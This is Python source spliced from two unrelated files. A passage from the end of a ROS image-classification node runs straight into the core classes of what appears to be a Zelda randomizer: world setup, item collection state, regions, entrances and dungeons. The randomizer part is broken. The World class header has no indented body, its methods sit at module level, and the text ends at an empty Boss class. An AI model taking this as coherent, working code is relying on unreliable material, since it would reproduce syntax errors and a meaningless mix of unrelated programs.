        self.print_info(f"Trigger topic: {self.settings['trigger_topic']}")
        self.print_info(f"Decision topic: {self.settings['decision_topic']}")

        self.img = None
        self.cv_bridge = CvBridge()
        self.classifier = load(self.classifier_path)

    def print_info(self, msg):
        """Log ``msg`` prefixed with the node name."""
        rospy.loginfo(f"[{rospy.get_name()}]: {msg}")

    def load_settings(self):
        """Fetch node settings from the ROS parameter server."""
        self.settings = rospy.get_param("ecs_ibec")

    def image_subscriber_callback(self, msg):
        """Decode the incoming compressed image into a BGR matrix."""
        raw = np.frombuffer(msg.data, np.uint8)
        self.img = cv2.imdecode(raw, cv2.IMREAD_COLOR)

    def descriptor_service_client(self):
        """Call the descriptor service for the current image; None on failure."""
        rospy.wait_for_service(self.settings["descriptor_service"])
        if self.img is None:
            return None
        try:
            call = rospy.ServiceProxy(
                self.settings["descriptor_service"], Descriptor)
            response = call(
                self.cv_bridge.cv2_to_imgmsg(self.img, encoding="bgr8"))
        except rospy.ServiceException as e:
            print("Service call failed: %s" % e)
        else:
            return response.data

    def trigger_callback(self, msg):
        """Run one classification cycle per trigger message."""
        self.process()

    def process(self):
        """Classify the current image and publish the mapped class name."""
        desc_vector = np.asarray(self.descriptor_service_client())
        if desc_vector is None:
            return
        prediction = self.classifier.predict(desc_vector.reshape(1, -1))[0]
        self.print_info(f"prediction: {prediction}")
        prediction_text = self.settings.get("class_mapping").get(str(prediction))
        if prediction_text is None:
            self.print_info(f"Unknown class prediction [class mapping is missing]")
            return
        self.decision_publisher.publish(prediction_text)
if __name__ == "__main__":
    # Start the classification node and block until ROS shuts down.
    rospy.init_node("ecs_classification_classic_node")
    ibec = ImageBasedEnvironmentClassification()
    rospy.spin()
import copy
from enum import Enum, unique
import logging
import json
from collections import OrderedDict
from collections_extended import bag
from EntranceShuffle import door_addresses
from Utils import int16_as_bytes
class World(object):
def __init__(self, players, shuffle, logic, mode, swords, difficulty, difficulty_adjustments, timer, progressive, goal, algorithm, accessibility, shuffle_ganon, retro, custom, customitemarray, hints):
    """Build a multiworld container holding per-player settings and state.

    Dict-valued options (shuffle, logic, mode, ...) are copied so later
    mutation of the caller's dicts cannot affect this world.
    """
    self.players = players
    self.teams = 1
    self.shuffle = shuffle.copy()
    self.logic = logic.copy()
    self.mode = mode.copy()
    self.swords = swords.copy()
    self.difficulty = difficulty.copy()
    self.difficulty_adjustments = difficulty_adjustments.copy()
    self.timer = timer
    self.progressive = progressive
    self.goal = goal.copy()
    self.algorithm = algorithm
    self.dungeons = []
    self.regions = []
    self.shops = []
    self.itempool = []
    self.seed = None
    self.precollected_items = []
    self.state = CollectionState(self)
    # Memoization caches for entrance/location lookups.
    self._cached_entrances = None
    self._cached_locations = None
    self._entrance_cache = {}
    self._location_cache = {}
    self.required_locations = []
    self.shuffle_bonk_prizes = False
    self.light_world_light_cone = False
    self.dark_world_light_cone = False
    self.clock_mode = 'off'
    self.rupoor_cost = 10
    self.aga_randomness = True
    self.lock_aga_door_in_escape = False
    self.save_and_quit_from_boss = True
    self.accessibility = accessibility.copy()
    self.shuffle_ganon = shuffle_ganon
    self.fix_gtower_exit = self.shuffle_ganon
    self.retro = retro.copy()
    self.custom = custom
    self.customitemarray = customitemarray
    self.can_take_damage = True
    self.hints = hints.copy()
    self.dynamic_regions = []
    self.dynamic_locations = []
    self.spoiler = Spoiler(self)
    self.lamps_needed_for_dark_rooms = 1

    # Per-player attributes are stored as {player: value} dicts on self.
    for player in range(1, players + 1):
        def set_player_attr(attr, val):
            self.__dict__.setdefault(attr, {})[player] = val
        set_player_attr('_region_cache', {})
        set_player_attr('player_names', [])
        set_player_attr('remote_items', False)
        set_player_attr('required_medallions', ['Ether', 'Quake'])
        set_player_attr('swamp_patch_required', False)
        set_player_attr('powder_patch_required', False)
        set_player_attr('ganon_at_pyramid', True)
        set_player_attr('ganonstower_vanilla', True)
        set_player_attr('sewer_light_cone', self.mode[player] == 'standard')
        # Exit/door fixes depend on the chosen entrance shuffle mode.
        set_player_attr('fix_trock_doors', self.shuffle[player] != 'vanilla' or self.mode[player] == 'inverted')
        set_player_attr('fix_skullwoods_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
        set_player_attr('fix_palaceofdarkness_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
        set_player_attr('fix_trock_exit', self.shuffle[player] not in ['vanilla', 'simple', 'restricted', 'dungeonssimple'])
        set_player_attr('can_access_trock_eyebridge', None)
        set_player_attr('can_access_trock_front', None)
        set_player_attr('can_access_trock_big_chest', None)
        set_player_attr('can_access_trock_middle', None)
        set_player_attr('fix_fake_world', True)
        set_player_attr('mapshuffle', False)
        set_player_attr('compassshuffle', False)
        set_player_attr('keyshuffle', False)
        set_player_attr('bigkeyshuffle', False)
        set_player_attr('difficulty_requirements', None)
        set_player_attr('boss_shuffle', 'none')
        set_player_attr('enemy_shuffle', 'none')
        set_player_attr('enemy_health', 'default')
        set_player_attr('enemy_damage', 'default')
        set_player_attr('beemizer', 0)
        set_player_attr('progressive', 'on')
        set_player_attr('escape_assist', [])
        set_player_attr('crystals_needed_for_ganon', 7)
        set_player_attr('crystals_needed_for_gt', 7)
        set_player_attr('open_pyramid', False)
        set_player_attr('treasure_hunt_icon', 'Triforce Piece')
        set_player_attr('treasure_hunt_count', 0)
def get_name_string_for_object(self, obj):
    """Return obj.name, qualified with player names in multiplayer worlds."""
    if self.players == 1:
        return obj.name
    return f'{obj.name} ({self.get_player_names(obj.player)})'
def get_player_names(self, player):
    """Return a comma-separated list of the player's names.

    Duplicates are dropped while preserving first-occurrence order;
    ``dict.fromkeys`` does this in O(n) instead of the old quadratic
    ``list.index`` scan, with identical output.
    """
    return ", ".join(dict.fromkeys(self.player_names[player]))
def initialize_regions(self, regions=None):
    """Attach regions to this world and index them in the per-player cache."""
    target = regions if regions else self.regions
    for region in target:
        region.world = self
        self._region_cache[region.player][region.name] = region
def get_regions(self, player=None):
    """Return all regions, or only the given player's cached regions."""
    if player is None:
        return self.regions
    return self._region_cache[player].values()
def get_region(self, regionname, player):
    """Resolve a region by name (a Region instance passes through unchanged)."""
    if isinstance(regionname, Region):
        return regionname
    cached = self._region_cache[player].get(regionname)
    if cached is not None:
        return cached
    # Cache miss: linear scan, legal only before initialize_regions ran.
    for region in self.regions:
        if region.name == regionname and region.player == player:
            assert not region.world  # this should only happen before initialization
            return region
    raise RuntimeError('No such region %s for player %d' % (regionname, player))
def get_entrance(self, entrance, player):
    """Resolve an entrance by name, memoizing lookups (an Entrance passes through)."""
    if isinstance(entrance, Entrance):
        return entrance
    key = (entrance, player)
    if key in self._entrance_cache:
        return self._entrance_cache[key]
    for region in self.regions:
        for candidate in region.exits:
            if candidate.name == entrance and candidate.player == player:
                self._entrance_cache[key] = candidate
                return candidate
    raise RuntimeError('No such entrance %s for player %d' % (entrance, player))
def get_location(self, location, player):
    """Resolve a location by name, memoizing lookups (a Location passes through)."""
    if isinstance(location, Location):
        return location
    key = (location, player)
    if key in self._location_cache:
        return self._location_cache[key]
    for region in self.regions:
        for candidate in region.locations:
            if candidate.name == location and candidate.player == player:
                self._location_cache[key] = candidate
                return candidate
    raise RuntimeError('No such location %s for player %d' % (location, player))
def get_dungeon(self, dungeonname, player):
    """Resolve a dungeon by name (a Dungeon instance passes through unchanged)."""
    if isinstance(dungeonname, Dungeon):
        return dungeonname
    for dungeon in self.dungeons:
        if dungeon.player == player and dungeon.name == dungeonname:
            return dungeon
    raise RuntimeError('No such dungeon %s for player %d' % (dungeonname, player))
def get_all_state(self, keys=False):
    """Return a CollectionState with every item in the pool (soft-)collected.

    Progressive items are resolved to the next tier allowed by the
    player's difficulty_requirements; with keys=True, a full complement
    of dungeon small/big keys is collected for every player as well.
    """
    ret = CollectionState(self)

    def soft_collect(item):
        # Progressive items upgrade one tier per copy, capped by the
        # per-player progressive_*_limit difficulty settings.
        if item.name.startswith('Progressive '):
            if 'Sword' in item.name:
                if ret.has('Golden Sword', item.player):
                    pass
                elif ret.has('Tempered Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 4:
                    ret.prog_items.add(('Golden Sword', item.player))
                elif ret.has('Master Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 3:
                    ret.prog_items.add(('Tempered Sword', item.player))
                elif ret.has('Fighter Sword', item.player) and self.difficulty_requirements[item.player].progressive_sword_limit >= 2:
                    ret.prog_items.add(('Master Sword', item.player))
                elif self.difficulty_requirements[item.player].progressive_sword_limit >= 1:
                    ret.prog_items.add(('Fighter Sword', item.player))
            elif 'Glove' in item.name:
                if ret.has('Titans Mitts', item.player):
                    pass
                elif ret.has('Power Glove', item.player):
                    ret.prog_items.add(('Titans Mitts', item.player))
                else:
                    ret.prog_items.add(('Power Glove', item.player))
            elif 'Shield' in item.name:
                if ret.has('Mirror Shield', item.player):
                    pass
                elif ret.has('Red Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 3:
                    ret.prog_items.add(('Mirror Shield', item.player))
                elif ret.has('Blue Shield', item.player) and self.difficulty_requirements[item.player].progressive_shield_limit >= 2:
                    ret.prog_items.add(('Red Shield', item.player))
                elif self.difficulty_requirements[item.player].progressive_shield_limit >= 1:
                    ret.prog_items.add(('Blue Shield', item.player))
            elif 'Bow' in item.name:
                if ret.has('Silver Arrows', item.player):
                    pass
                elif ret.has('Bow', item.player) and self.difficulty_requirements[item.player].progressive_bow_limit >= 2:
                    ret.prog_items.add(('Silver Arrows', item.player))
                elif self.difficulty_requirements[item.player].progressive_bow_limit >= 1:
                    ret.prog_items.add(('Bow', item.player))
        elif item.name.startswith('Bottle'):
            # Bottles are capped by the progressive bottle limit.
            if ret.bottle_count(item.player) < self.difficulty_requirements[item.player].progressive_bottle_limit:
                ret.prog_items.add((item.name, item.player))
        elif item.advancement or item.smallkey or item.bigkey:
            ret.prog_items.add((item.name, item.player))

    for item in self.itempool:
        soft_collect(item)

    if keys:
        # Grant every dungeon's key set to each player.
        for p in range(1, self.players + 1):
            from Items import ItemFactory
            for item in ItemFactory(['Small Key (Escape)', 'Big Key (Eastern Palace)', 'Big Key (Desert Palace)', 'Small Key (Desert Palace)', 'Big Key (Tower of Hera)', 'Small Key (Tower of Hera)', 'Small Key (Agahnims Tower)', 'Small Key (Agahnims Tower)',
                                     'Big Key (Palace of Darkness)'] + ['Small Key (Palace of Darkness)'] * 6 + ['Big Key (Thieves Town)', 'Small Key (Thieves Town)', 'Big Key (Skull Woods)'] + ['Small Key (Skull Woods)'] * 3 + ['Big Key (Swamp Palace)',
                                     'Small Key (Swamp Palace)', 'Big Key (Ice Palace)'] + ['Small Key (Ice Palace)'] * 2 + ['Big Key (Misery Mire)', 'Big Key (Turtle Rock)', 'Big Key (Ganons Tower)'] + ['Small Key (Misery Mire)'] * 3 + ['Small Key (Turtle Rock)'] * 4 + ['Small Key (Ganons Tower)'] * 4,
                                    p):
                soft_collect(item)
    ret.sweep_for_events()
    return ret
def get_items(self):
    """Return every item in the world: placed items plus the unplaced pool."""
    placed = [location.item for location in self.get_filled_locations()]
    return placed + self.itempool
def find_items(self, item, player):
    """Return all locations holding the given player's item with that name."""
    return [
        location
        for location in self.get_locations()
        if location.item is not None
        and location.item.name == item
        and location.item.player == player
    ]
def push_precollected(self, item):
    """Register an item the player starts with and collect it into state."""
    item.world = self
    key_counts_as_advancement = (item.smallkey and self.keyshuffle[item.player]) or (
        item.bigkey and self.bigkeyshuffle[item.player]
    )
    if key_counts_as_advancement:
        # Shuffled dungeon keys are treated as progression items.
        item.advancement = True
    self.precollected_items.append(item)
    self.state.collect(item, True)
def push_item(self, location, item, collect=True):
    """Place ``item`` at ``location``, optionally collecting it into state."""
    if not isinstance(location, Location):
        raise RuntimeError('Cannot assign item %s to location %s (player %d).' % (item, location, item.player))
    if not location.can_fill(self.state, item, False):
        raise RuntimeError('Cannot assign item %s to location %s.' % (item, location))
    location.item = item
    item.location = location
    item.world = self
    if collect:
        self.state.collect(item, location.event, location)
    logging.getLogger('').debug('Placed %s at %s', item, location)
def get_entrances(self):
    """Return all entrances, memoizing the flattened list on first use."""
    if self._cached_entrances is None:
        self._cached_entrances = [
            entrance for region in self.regions for entrance in region.entrances
        ]
    return self._cached_entrances
def clear_entrance_cache(self):
    """Drop the memoized entrance list (e.g. after entrances change)."""
    self._cached_entrances = None
def get_locations(self):
    """Return every location across all regions, memoised until the cache is cleared."""
    if self._cached_locations is None:
        collected = []
        for region in self.regions:
            collected.extend(region.locations)
        self._cached_locations = collected
    return self._cached_locations
def clear_location_cache(self):
    """Invalidate the memoised location list built by get_locations()."""
    self._cached_locations = None
def get_unfilled_locations(self, player=None):
    """Return item-less locations, optionally restricted to one *player*."""
    def _wanted(location):
        return (player is None or location.player == player) and location.item is None
    return [location for location in self.get_locations() if _wanted(location)]
def get_filled_locations(self, player=None):
    """Return locations that already hold an item, optionally for one *player*."""
    def _wanted(location):
        return (player is None or location.player == player) and location.item is not None
    return [location for location in self.get_locations() if _wanted(location)]
def get_reachable_locations(self, state=None, player=None):
    """Return locations reachable in *state* (defaults to the world's base state)."""
    search_state = self.state if state is None else state
    return [location for location in self.get_locations()
            if (player is None or location.player == player) and location.can_reach(search_state)]
def get_placeable_locations(self, state=None, player=None):
    """Return reachable, still-empty locations (defaults to the base state)."""
    search_state = self.state if state is None else state
    return [location for location in self.get_locations()
            if (player is None or location.player == player)
            and location.item is None and location.can_reach(search_state)]
def unlocks_new_location(self, item):
    """Return True when collecting *item* would open at least one new location."""
    projected = self.state.copy()
    projected.collect(item, True)
    for location in self.get_unfilled_locations():
        # New = reachable with the item but not without it.
        if projected.can_reach(location) and not self.state.can_reach(location):
            return True
    return False
def has_beaten_game(self, state, player=None):
    """Victory check: one player's Triforce, or every player's when *player* is falsy."""
    if player:
        return state.has('Triforce', player)
    return all(self.has_beaten_game(state, p) for p in range(1, self.players + 1))
def can_beat_game(self, starting_state=None):
    """Simulate collection sphere by sphere to decide whether the seed is completable."""
    if starting_state:
        state = starting_state.copy()
    else:
        state = CollectionState(self)
    if self.has_beaten_game(state):
        return True
    # Only placed progression items (or event locations) can change reachability.
    prog_locations = [location for location in self.get_locations()
                      if location.item is not None
                      and (location.item.advancement or location.event)
                      and location not in state.locations_checked]
    while prog_locations:
        # Everything reachable right now forms one sphere; items inside a
        # sphere never depend on each other, only on earlier spheres.
        sphere = [location for location in prog_locations if location.can_reach(state)]
        if not sphere:
            # Ran out of reachable progression without winning: unbeatable.
            return False
        for location in sphere:
            prog_locations.remove(location)
            state.collect(location.item, True, location)
        if self.has_beaten_game(state):
            return True
    return False
class CollectionState(object):
    """Mutable snapshot of collected progression items and reachable regions.

    Fixes over the previous revision:
    - remove(): the Shield fallback assigned the *string* ``'None'`` instead of
      ``None``, so the removal attempt raised ValueError and returned early,
      skipping the cache invalidation below.
    - __getattr__(): ``item[10]`` took a single character after the
      ``can_reach_`` prefix; ``item[10:]`` passes the full spot name.
    """

    def __init__(self, parent):
        self.prog_items = bag()
        self.world = parent
        self.reachable_regions = {player: set() for player in range(1, parent.players + 1)}
        self.events = []
        self.path = {}
        self.locations_checked = set()
        # Per-player flag: True means reachable_regions needs recomputation.
        self.stale = {player: True for player in range(1, parent.players + 1)}
        for item in parent.precollected_items:
            self.collect(item, True)

    def update_reachable_regions(self, player):
        """Fixed-point sweep: keep adding regions until none becomes newly reachable."""
        player_regions = self.world.get_regions(player)
        self.stale[player] = False
        rrp = self.reachable_regions[player]
        new_regions = True
        reachable_regions_count = len(rrp)
        while new_regions:
            player_regions = [region for region in player_regions if region not in rrp]
            for candidate in player_regions:
                if candidate.can_reach_private(self):
                    rrp.add(candidate)
            new_regions = len(rrp) > reachable_regions_count
            reachable_regions_count = len(rrp)

    def copy(self):
        """Return an independent copy (item objects are shared, containers are not)."""
        ret = CollectionState(self.world)
        ret.prog_items = self.prog_items.copy()
        ret.reachable_regions = {player: copy.copy(self.reachable_regions[player]) for player in range(1, self.world.players + 1)}
        ret.events = copy.copy(self.events)
        ret.path = copy.copy(self.path)
        ret.locations_checked = copy.copy(self.locations_checked)
        return ret

    def can_reach(self, spot, resolution_hint=None, player=None):
        """Resolve *spot* (an object or a name plus hint) and test reachability."""
        try:
            spot_type = spot.spot_type
        except AttributeError:
            # try to resolve a name
            if resolution_hint == 'Location':
                spot = self.world.get_location(spot, player)
            elif resolution_hint == 'Entrance':
                spot = self.world.get_entrance(spot, player)
            else:
                # default to Region
                spot = self.world.get_region(spot, player)
        return spot.can_reach(self)

    def sweep_for_events(self, key_only=False, locations=None):
        """Collect all reachable event items, looping until no new one appears."""
        # this may need improvement
        if locations is None:
            locations = self.world.get_filled_locations()
        new_locations = True
        checked_locations = 0
        while new_locations:
            reachable_events = [location for location in locations if location.event and
                                (not key_only or (not self.world.keyshuffle[location.item.player] and location.item.smallkey) or (not self.world.bigkeyshuffle[location.item.player] and location.item.bigkey))
                                and location.can_reach(self)]
            for event in reachable_events:
                if (event.name, event.player) not in self.events:
                    self.events.append((event.name, event.player))
                    self.collect(event.item, True, event)
            new_locations = len(reachable_events) > checked_locations
            checked_locations = len(reachable_events)

    def has(self, item, player, count=1):
        if count == 1:
            return (item, player) in self.prog_items
        return self.prog_items.count((item, player)) >= count

    def has_key(self, item, player, count=1):
        # In retro mode every small key is replaced by purchasable universal keys.
        if self.world.retro[player]:
            return self.can_buy_unlimited('Small Key (Universal)', player)
        if count == 1:
            return (item, player) in self.prog_items
        return self.prog_items.count((item, player)) >= count

    def can_buy_unlimited(self, item, player):
        for shop in self.world.shops:
            if shop.region.player == player and shop.has_unlimited(item) and shop.region.can_reach(self):
                return True
        return False

    def item_count(self, item, player):
        return self.prog_items.count((item, player))

    def has_crystals(self, count, player):
        crystals = ['Crystal 1', 'Crystal 2', 'Crystal 3', 'Crystal 4', 'Crystal 5', 'Crystal 6', 'Crystal 7']
        return len([crystal for crystal in crystals if self.has(crystal, player)]) >= count

    def can_lift_rocks(self, player):
        return self.has('Power Glove', player) or self.has('Titans Mitts', player)

    def has_bottle(self, player):
        return self.bottle_count(player) > 0

    def bottle_count(self, player):
        return len([item for (item, itemplayer) in self.prog_items if item.startswith('Bottle') and itemplayer == player])

    def has_hearts(self, player, count):
        # Warning: This only considers items that are marked as advancement items
        return self.heart_count(player) >= count

    def heart_count(self, player):
        # Warning: This only considers items that are marked as advancement items
        diff = self.world.difficulty_requirements[player]
        return (
            min(self.item_count('Boss Heart Container', player), diff.boss_heart_container_limit)
            + self.item_count('Sanctuary Heart Container', player)
            + min(self.item_count('Piece of Heart', player), diff.heart_piece_limit) // 4
            + 3  # starting hearts
        )

    def can_lift_heavy_rocks(self, player):
        return self.has('Titans Mitts', player)

    def can_extend_magic(self, player, smallmagic=16, fullrefill=False):  # This reflects the total magic Link has, not the total extra he has.
        basemagic = 8
        if self.has('Quarter Magic', player):
            basemagic = 32
        elif self.has('Half Magic', player):
            basemagic = 16
        if self.can_buy_unlimited('Green Potion', player) or self.can_buy_unlimited('Blue Potion', player):
            if self.world.difficulty_adjustments[player] == 'hard' and not fullrefill:
                basemagic = basemagic + int(basemagic * 0.5 * self.bottle_count(player))
            elif self.world.difficulty_adjustments[player] == 'expert' and not fullrefill:
                basemagic = basemagic + int(basemagic * 0.25 * self.bottle_count(player))
            else:
                basemagic = basemagic + basemagic * self.bottle_count(player)
        return basemagic >= smallmagic

    def can_kill_most_things(self, player, enemies=5):
        return (self.has_blunt_weapon(player)
                or self.has('Cane of Somaria', player)
                or (self.has('Cane of Byrna', player) and (enemies < 6 or self.can_extend_magic(player)))
                or self.can_shoot_arrows(player)
                or self.has('Fire Rod', player)
                )

    def can_shoot_arrows(self, player):
        if self.world.retro[player]:
            # TODO: need to decide how we want to handle wooden arrows longer-term (a can-buy-a check, or via dynamic shop location)
            # FIXME: Should do something about hard+ ganon only silvers. For the moment, i believe they effective grant wooden, so we are safe
            return self.has('Bow', player) and (self.has('Silver Arrows', player) or self.can_buy_unlimited('Single Arrow', player))
        return self.has('Bow', player)

    def can_get_good_bee(self, player):
        cave = self.world.get_region('Good Bee Cave', player)
        return (
            self.has_bottle(player) and
            self.has('Bug Catching Net', player) and
            (self.has_Boots(player) or (self.has_sword(player) and self.has('Quake', player))) and
            cave.can_reach(self) and
            self.is_not_bunny(cave, player)
        )

    def has_sword(self, player):
        return self.has('Fighter Sword', player) or self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)

    def has_beam_sword(self, player):
        return self.has('Master Sword', player) or self.has('Tempered Sword', player) or self.has('Golden Sword', player)

    def has_blunt_weapon(self, player):
        return self.has_sword(player) or self.has('Hammer', player)

    def has_Mirror(self, player):
        return self.has('Magic Mirror', player)

    def has_Boots(self, player):
        return self.has('Pegasus Boots', player)

    def has_Pearl(self, player):
        return self.has('Moon Pearl', player)

    def has_fire_source(self, player):
        return self.has('Fire Rod', player) or self.has('Lamp', player)

    def can_flute(self, player):
        lw = self.world.get_region('Light World', player)
        return self.has('Ocarina', player) and lw.can_reach(self) and self.is_not_bunny(lw, player)

    def can_melt_things(self, player):
        return self.has('Fire Rod', player) or (self.has('Bombos', player) and self.has_sword(player))

    def can_avoid_lasers(self, player):
        return self.has('Mirror Shield', player) or self.has('Cane of Byrna', player) or self.has('Cape', player)

    def is_not_bunny(self, region, player):
        if self.has_Pearl(player):
            return True
        return region.is_light_world if self.world.mode[player] != 'inverted' else region.is_dark_world

    def can_reach_light_world(self, player):
        if True in [i.is_light_world for i in self.reachable_regions[player]]:
            return True
        return False

    def can_reach_dark_world(self, player):
        if True in [i.is_dark_world for i in self.reachable_regions[player]]:
            return True
        return False

    def has_misery_mire_medallion(self, player):
        return self.has(self.world.required_medallions[player][0], player)

    def has_turtle_rock_medallion(self, player):
        return self.has(self.world.required_medallions[player][1], player)

    def collect(self, item, event=False, location=None):
        """Add *item* to the state, resolving progressive items to their concrete tier."""
        if location:
            self.locations_checked.add(location)
        changed = False
        if item.name.startswith('Progressive '):
            if 'Sword' in item.name:
                if self.has('Golden Sword', item.player):
                    pass
                elif self.has('Tempered Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 4:
                    self.prog_items.add(('Golden Sword', item.player))
                    changed = True
                elif self.has('Master Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 3:
                    self.prog_items.add(('Tempered Sword', item.player))
                    changed = True
                elif self.has('Fighter Sword', item.player) and self.world.difficulty_requirements[item.player].progressive_sword_limit >= 2:
                    self.prog_items.add(('Master Sword', item.player))
                    changed = True
                elif self.world.difficulty_requirements[item.player].progressive_sword_limit >= 1:
                    self.prog_items.add(('Fighter Sword', item.player))
                    changed = True
            elif 'Glove' in item.name:
                if self.has('Titans Mitts', item.player):
                    pass
                elif self.has('Power Glove', item.player):
                    self.prog_items.add(('Titans Mitts', item.player))
                    changed = True
                else:
                    self.prog_items.add(('Power Glove', item.player))
                    changed = True
            elif 'Shield' in item.name:
                if self.has('Mirror Shield', item.player):
                    pass
                elif self.has('Red Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 3:
                    self.prog_items.add(('Mirror Shield', item.player))
                    changed = True
                elif self.has('Blue Shield', item.player) and self.world.difficulty_requirements[item.player].progressive_shield_limit >= 2:
                    self.prog_items.add(('Red Shield', item.player))
                    changed = True
                elif self.world.difficulty_requirements[item.player].progressive_shield_limit >= 1:
                    self.prog_items.add(('Blue Shield', item.player))
                    changed = True
            elif 'Bow' in item.name:
                if self.has('Silver Arrows', item.player):
                    pass
                elif self.has('Bow', item.player):
                    self.prog_items.add(('Silver Arrows', item.player))
                    changed = True
                else:
                    self.prog_items.add(('Bow', item.player))
                    changed = True
        elif item.name.startswith('Bottle'):
            if self.bottle_count(item.player) < self.world.difficulty_requirements[item.player].progressive_bottle_limit:
                self.prog_items.add((item.name, item.player))
                changed = True
        elif event or item.advancement:
            self.prog_items.add((item.name, item.player))
            changed = True
        self.stale[item.player] = True
        if changed:
            if not event:
                self.sweep_for_events()

    def remove(self, item):
        """Remove *item* (resolving progressive items to the highest held tier)."""
        if item.advancement:
            to_remove = item.name
            if to_remove.startswith('Progressive '):
                if 'Sword' in to_remove:
                    if self.has('Golden Sword', item.player):
                        to_remove = 'Golden Sword'
                    elif self.has('Tempered Sword', item.player):
                        to_remove = 'Tempered Sword'
                    elif self.has('Master Sword', item.player):
                        to_remove = 'Master Sword'
                    elif self.has('Fighter Sword', item.player):
                        to_remove = 'Fighter Sword'
                    else:
                        to_remove = None
                elif 'Glove' in item.name:
                    if self.has('Titans Mitts', item.player):
                        to_remove = 'Titans Mitts'
                    elif self.has('Power Glove', item.player):
                        to_remove = 'Power Glove'
                    else:
                        to_remove = None
                elif 'Shield' in item.name:
                    if self.has('Mirror Shield', item.player):
                        to_remove = 'Mirror Shield'
                    elif self.has('Red Shield', item.player):
                        to_remove = 'Red Shield'
                    elif self.has('Blue Shield', item.player):
                        to_remove = 'Blue Shield'
                    else:
                        # Fixed: was the string 'None', which defeated the
                        # `is not None` guard below and triggered a spurious
                        # ValueError/early return.
                        to_remove = None
                elif 'Bow' in item.name:
                    if self.has('Silver Arrows', item.player):
                        to_remove = 'Silver Arrows'
                    elif self.has('Bow', item.player):
                        to_remove = 'Bow'
                    else:
                        to_remove = None
            if to_remove is not None:
                try:
                    self.prog_items.remove((to_remove, item.player))
                except ValueError:
                    return
                # invalidate caches, nothing can be trusted anymore now
                self.reachable_regions[item.player] = set()
                self.stale[item.player] = True

    def __getattr__(self, item):
        if item.startswith('can_reach_'):
            # Fixed: item[10] passed only one character of the spot name.
            return self.can_reach(item[10:])
        # elif item.startswith('has_'):
        #     return self.has(item[4])
        if item == '__len__':
            return
        raise RuntimeError('Cannot parse %s.' % item)
@unique
class RegionType(Enum):
    """Broad classification of a map region."""
    LightWorld = 1
    DarkWorld = 2
    Cave = 3  # Also includes Houses
    Dungeon = 4

    @property
    def is_indoors(self):
        """Shorthand for checking if Cave or Dungeon"""
        return self is RegionType.Cave or self is RegionType.Dungeon
class Region(object):
    """A graph node holding locations, linked to others via entrances and exits."""

    def __init__(self, name, type, hint, player):
        self.name = name
        self.type = type
        self.entrances = []
        self.exits = []
        self.locations = []
        self.dungeon = None
        self.shop = None
        self.world = None
        # Light/dark flags are filled in after connections have been made.
        self.is_light_world = False
        self.is_dark_world = False
        self.spot_type = 'Region'
        self.hint_text = hint
        self.recursion_count = 0
        self.player = player

    def can_reach(self, state):
        """Reachability via the state's cached region set, refreshing when stale."""
        if state.stale[self.player]:
            state.update_reachable_regions(self.player)
        return self in state.reachable_regions[self.player]

    def can_reach_private(self, state):
        """Direct test: reachable when any entrance is passable in *state*."""
        for entrance in self.entrances:
            if entrance.can_reach(state):
                # Remember how this region was first reached, for spoiler paths.
                if self not in state.path:
                    state.path[self] = (self.name, state.path.get(entrance, None))
                return True
        return False

    def can_fill(self, item):
        """Whether *item* may be placed here (dungeon-item containment rules)."""
        keep_in_dungeon = ((item.smallkey and not self.world.keyshuffle[item.player])
                           or (item.bigkey and not self.world.bigkeyshuffle[item.player])
                           or (item.map and not self.world.mapshuffle[item.player])
                           or (item.compass and not self.world.compassshuffle[item.player]))
        # Standard mode pins the Escape small key inside its dungeon.
        sewer_hack = self.world.mode[item.player] == 'standard' and item.name == 'Small Key (Escape)'
        if sewer_hack or keep_in_dungeon:
            return self.dungeon and self.dungeon.is_dungeon_item(item) and item.player == self.player
        return True

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
class Entrance(object):
    """A one-way connection leading out of a parent region."""

    def __init__(self, player, name='', parent=None):
        self.name = name
        self.parent_region = parent
        self.connected_region = None
        self.target = None
        self.addresses = None
        self.spot_type = 'Entrance'
        self.recursion_count = 0
        self.vanilla = None
        # Always passable by default; the rules module installs the real rule.
        self.access_rule = lambda state: True
        self.player = player

    def can_reach(self, state):
        """Passable when the parent region is reachable and the access rule allows it."""
        if not (self.parent_region.can_reach(state) and self.access_rule(state)):
            return False
        # Record how this entrance was first reached, for spoiler paths.
        if self not in state.path:
            state.path[self] = (self.name, state.path.get(self.parent_region, (self.parent_region.name, None)))
        return True

    def connect(self, region, addresses=None, target=None, vanilla=None):
        """Attach this entrance to *region* and register it on that region."""
        self.connected_region = region
        self.target = target
        self.addresses = addresses
        self.vanilla = vanilla
        region.entrances.append(self)

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        world = self.parent_region.world if self.parent_region else None
        return world.get_name_string_for_object(self) if world else f'{self.name} (Player {self.player})'
class Dungeon(object):
    """Groups a dungeon's regions with its key and dungeon-item pools."""

    def __init__(self, name, regions, big_key, small_keys, dungeon_items, player):
        self.name = name
        self.regions = regions
        self.big_key = big_key
        self.small_keys = small_keys
        self.dungeon_items = dungeon_items
        self.bosses = dict()
        self.player = player
        self.world = None

    @property
    def boss(self):
        """Single-boss convenience accessor (stored under key None)."""
        return self.bosses.get(None, None)

    @boss.setter
    def boss(self, value):
        self.bosses[None] = value

    @property
    def keys(self):
        """All small keys plus the big key, when one exists."""
        if self.big_key:
            return self.small_keys + [self.big_key]
        return self.small_keys + []

    @property
    def all_items(self):
        """Every item native to this dungeon: dungeon items plus keys."""
        return self.dungeon_items + self.keys

    def is_dungeon_item(self, item):
        """True when *item* belongs to this dungeon's player and item pool."""
        native_names = [dungeon_item.name for dungeon_item in self.all_items]
        return item.player == self.player and item.name in native_names

    def __str__(self):
        return str(self.__unicode__())

    def __unicode__(self):
        return self.world.get_name_string_for_object(self) if self.world else f'{self.name} (Player {self.player})'
class Boss(object):
    """A dungeon boss and the rule deciding whether it can be defeated."""

